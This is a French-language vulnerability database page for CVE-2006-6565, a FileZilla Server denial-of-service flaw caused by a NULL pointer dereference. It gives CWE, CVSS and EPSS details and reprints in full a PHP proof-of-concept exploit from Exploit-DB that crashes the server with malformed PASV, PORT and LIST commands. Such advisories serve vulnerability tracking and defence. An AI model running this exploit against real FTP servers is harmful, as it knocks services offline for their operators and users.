CVE-2006-6565 : Détail

CVE-2006-6565

Memory Corruption
9.71%V3
Network
2006-12-15
10h00 +00:00
2017-10-18
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

FileZilla Server before 0.9.22 allows remote attackers to cause a denial of service (crash) via a wildcard argument to the (1) LIST or (2) NLST commands, which results in a NULL pointer dereference, a different set of vectors than CVE-2006-6564. NOTE: CVE analysis suggests that the problem might be due to a malformed PORT command.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-476 NULL Pointer Dereference
The product dereferences a pointer that it expects to be valid but is NULL.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4 AV:N/AC:L/Au:S/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 2914

Date de publication : 2006-12-10 23h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

<?php # Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service # by shinnai # mail: shinnai[at]autistici[dot[org] # site: http://shinnai.altervista.org # # special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html # and for code in php I never could write alone ;) # This one works fine also with an user with only read and list permissions enabled # you can change the LIST command also with NLST or NLST -al comamnds # tested on Windows XP Professional SP2 all patched error_reporting(E_ALL); $service_port = getservbyname('ftp', 'tcp'); $address = gethostbyname('127.0.0.1'); $user="test"; $pass="test"; $junk.="A*"; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket < 0) { echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n"; } else { echo "OK.\n"; } $result = socket_connect($socket, $address, $service_port); if ($result < 0) { echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n"; } else { echo "OK.\n"; } $out=socket_read($socket, 240); echo $out; $in = "USER ".$user."\r\n"; socket_write($socket, $in, strlen ($in)); $out=socket_read($socket, 80); echo $out; $in = "PASS ".$pass."\r\n"; socket_write($socket, $in, strlen ($in)); $out=socket_read($socket, 80); echo $out; $in = "PASV ".$junk."\r\n"; socket_write($socket, $in, strlen ($in)); $in = "PORT ".$junk."\r\n"; socket_write($socket, $in, strlen ($in)); $in = "LIST ".$junk."\r\n"; socket_write($socket, $in, strlen ($in)); socket_close($socket); ?> # milw0rm.com [2006-12-11]

Products Mentioned

Configuraton 0

Filezilla-project>>Filezilla_server >> Version To (excluding) 0.9.22

Références

https://www.exploit-db.com/exploits/2914
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2006/4937
Tags : vdb-entry, x_refsource_VUPEN